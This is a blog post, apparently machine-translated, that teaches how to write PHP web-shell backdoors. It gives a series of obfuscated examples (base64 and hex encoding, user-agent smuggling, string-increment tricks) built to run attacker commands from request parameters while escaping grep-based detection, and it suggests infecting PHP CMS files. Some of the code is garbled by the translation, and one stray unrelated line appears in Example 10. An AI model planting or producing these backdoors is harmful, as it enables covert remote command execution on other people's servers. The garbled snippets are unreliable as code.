HOLD THE SHIT — PHP Backdoor for fun
This little post for fun is focused on one of the different techniques. Thinking out of the box, giving exit() basics used in many…
This little post for fun is focused on one of the different techniques. Thinking out of the box, giving exit() basics used in many backdoor codes.
The post focused on the global variables GET, POST, REQUEST.
The most used functions:
(PHP 4, PHP 5, PHP 7)
shell_exec - Execute command via shell and return the complete output as a string
string shell_exec (string $ cmd)
EXEC-> php -r 'shell_exec ("ls -la");'(PHP 4, PHP 5, PHP 7)
system - Executes an external program and shows the output
string system (string $ command [, int & $ return_var])
EXEC-> php -r 'system ("ls -la");'(PHP 4, PHP 5, 7 PHP)
exec - Execute external program
string Exec (Command String $ [, $ & array output [int & return_var $]])
EXEC-> php -r 'exec ("ls -la", $ var); print_r ($ var);'(PHP 4, PHP 5, PHP 7)
passthru - Execute an external program and show the raw output
void passthru (string $ command [, int & $ return_var])
EXEC-> php -r 'passthru ("ls -la", $ var); 'Simple implementation:
shell_exec:
if (isset ($ _ REQUEST ['cmd'])) {$ cmd = shell_exec ($ _ REQUEST ['cmd']);
print_r ($ cmd);} system:
if (isset ($ _ REQUEST ['cmd'])) {system ($ _ REQUEST ['cmd']); }exec:
if (isset ($ _ REQUEST ['cmd'])) {exec ($ _ REQUEST ['cmd']); }passthru:
if (isset ($ _ REQUEST ['cmd'])) {passthru ($ _ REQUEST ['cmd']); }We can use the same functions, but in an elaborate way avoiding that a simple “grep -E” reveals our access.
TIPS:
Use of shellcode in fixed values.
Array is life! Use without moderation.
Concatenation of native functions & definition of variables.
base64_decode — encode (data), bin2hex, error_reporting (0)
Use requests (get or post) that already exist on the system.
Study the creation of malicious properties in system’s class, create its functions.
Handling values of the global variable $ _SERVER.
Study infection methods for CMS files made in PHP.
Let’s go to the examples
EXAMPLE 01
Functions:
Variables: c3lzdGVt = system, dW5hbWUgLWE7bHM7 = uname -a; ls; , aWQ = = id
CODE:
(error_reporting (0)) ($ __ = @ base64_decode ("c3lzdGVt")) $ __ ( base64_decode ("aWQ ="))
. define ("_", "dW5hbWUgLWE7bHM7"). __ ( base64_decode (_)). exit );Execution: curl -v ‘http://localhost/shell.php'
EXAMPLE 02
Functions:
Variables: c3lzdGVt = system
CODE:
(error_reporting (0) (= @ $ __. base64_decode ( "c3lzdGVt"))
. print ($ __ ( Isset ($ _REQUEST [0]) REQUEST $ _ [0] NULL))?. EXIT );Execution: curl -v ‘http://localhost/shell.php?0=id'
EXAMPLE 03
Functions:
CREATE_FUNCTION — Creates an anonymous function (lambda-style)
Variables: ZWNobyhzaGVsbF9leGVjKCRfKSk7 = echo (shell_exec ($ _));
CODE:
( Error_reporting (0)) ($ _ = $ _ REQUEST [0]).
($ __ = @. Create_function ( '$ _' base64_decode ( "ZWNobyhzaGVsbF9leGVjKCRfKSk7"))) ($ __ ($ _) exit..);Execution: curl -v ‘http://localhost/shell.php?0=id'
EXAMPLE 04
Functions:
Variables: $ _GET [1] = Function name, $ _GET [2] = command that will execute
CODE:
( Error_reporting (0) (= @ $ _ $ _ GET [1]) (.. $ _ ($ _GET [2])). EXIT );Execution: curl -v ‘http://localhost/shell.php?1=system&2=id;uname'
EXAMPLE 05
Functions:
Variables: $ _REQUEST [1] = Function name, $ _REQUEST [2] = command that will execute
CODE:
( error_reporting (0)). ( extract ($ _REQUEST, EXTR_PREFIX_ALL))
($ _ = @ get_defined_vars () ['_ REQUEST']) ( define ('_', $ _ [2])) (($ _ [1] (_));Execution: curl -v ‘http://localhost/shell.php?1=system&2=id;uname'
EXAMPLE 06
Functions:
Variables: SFRUUF9VU0VSX0FHRU5U = HTTP_USER_AGENT
CODE:
( error_reporting (0)). ($ _ = @ explode (',', $ _ SERVER [ base64_decode ('SFRUUF9VU0VSX0FHRU5U')]))
($ _ [0] ("{$ _ [1]")). exit ;Execution: curl -v ‘http://localhost/shell.php' — user-agent’system,id;ls -la’
EXAMPLE 07
Functions:
Variables: \x30=0, \x73=s, \x79=y, \x73=s, \x74=t, \x65=e, \x6D=m
CODE:
( error_reporting (0)). ($ _ [0] [] = @ $ _ GET ["\ x30"])
($ _ [1] [] = "\ x73") ($ _ [1] [] = "\ x79").
($ _ [1] [] = "\ x6D") ($ _ [1] [] = "\ x65").($ ___. = $ __ [0])
($ __ = @ get_defined_vars () ['_'] [1])
($ ___. = $ __ [1]) ($ ___. = $ __ [2]) ($ ___. = $ __ [3])
. ($ = ___ __ $ [4].) ($ = $ __ ___ [5].) (($ ___ ( "{$ _ [0] [0]}"))... EXIT );Execution: curl -v ‘http://localhost/shell.php?0=id;uname%20-a'
EXAMPLE 08
Functions:
Variables: $ _REQUEST [0] = Command that will execute
CODE:
( error_reporting (0)). ( str_replace ('$', '@', '#')
, 's $ ## and @ # $ @ # $ @ # $ @ s $ # $ @ # $ ($ _ {$ _ REQUEST [0]}));Execution: curl -v ‘http://localhost/shell.php?0=id
EXAMPLE 09
Functions:
Variables: $ _POST [‘shellrox’] = Command that will execute
CODE:
( error_reporting (0)). ($ _ = [("\ x73 \ x79").
("\ x74 \ x65 \ x6d"), "\ x73 \ x68 \ x65 \ x6c", "\ x6c \ x72 \ x6f \ x78"
($ _ [0] ($ _ POST [$ _ [1]. $ _ [2]]));Execution: curl -d “shellrox=id;uname -a” -X POST ‘http://localhost/shell.php'
EXAMPLE 10
Functions:
CODE:
$ _ = ""; # we need a blank string to start
Eur-lex.europa.eu eur-lex.europa.eu # access part of the string to convert to an array
$ _ = $ _. ""; # convert the array into a string of "Array"
Eur-lex.europa.eu eur-lex.europa.eu # access the 0 index of the string "Array" which is "A"# INCREASING VALUES TO FIND THE LETTERS
# IF YOU WANT TO MOUNT THE STRING SYSTEM($ _ ++); #THE
($ _ ++); #B
($ _ ++); #W
($ _ ++); #D# FIRST LETTER FOUND IS PLAYED IN A SECONDARY ARRAY
($ ___ [] = $ _ ++);($ _ ++); #F
($ _ ++); #G
($ _ ++); #H
($ _ ++); #I
($ _ ++); #J
($ _ ++); #K
($ _ ++); #L# FINISHED LETTER IS PLAYED IN A SECONDARY ARRAY($ ___ [] = $ _ ++); # M($ _ ++); #N
($ _ ++); #O
($ _ ++); #P
($ _ ++); #Q
($ _ ++); #R# FINISHED LETTER IS PLAYED IN A SECONDARY ARRAY($ ___ [] = $ _ ++);# FINISHED LETTER IS PLAYED IN A SECONDARY ARRAY($ ___ [] = $ _ ++); # T($ _ ++); #U
($ _ ++); #V
($ _ ++); #W
($ _ ++); #X# FINISHED LETTER IS PLAYED IN A SECONDARY ARRAY($ ___ [] = $ _ ++);(Z)
# ARRAY DEBUG:
/ * Array
(
[0] => E
[1] => M
[2] => S
[3] => T
[4] => Y
)
* /# MOUNT STRING WITH ARRAY FIELDS $ ___
$ ___ [2]. $ ___ [4]. $ ___ [2]. $ ___ [3]. ___ [0]. ___ [1];# USING ANONYMOUS FUNCTION TECHNIQUE FOR IMPLEMENTATION
$ _____ ('id; uname -a');MINIMALIST VERSION:
($ _ = $ _ [+] "). ($ _ ++). ($ _ = $ _.
($ _ ++). ($ _ ++). ($ _ ++) ($ _ ++).
($ _ ++). ($ _ ++). ($ _ ++). ($ _ ++).
($ _ ++). ($ _ ++). ($ _ ++). ($ _ ++).
($ _ ++). ($ _ ++). ($ _ ++).
($ ___ [] = $ _ ++). ($ _ ++)
(_____ = $ ___ [2]. $ ___ [4]. ___ [2]. ___ [3]. ___ [0]. ___ [1])
($ _____ ('id; uname -a'));Execution: curl -v 'http://localhost/shell.php'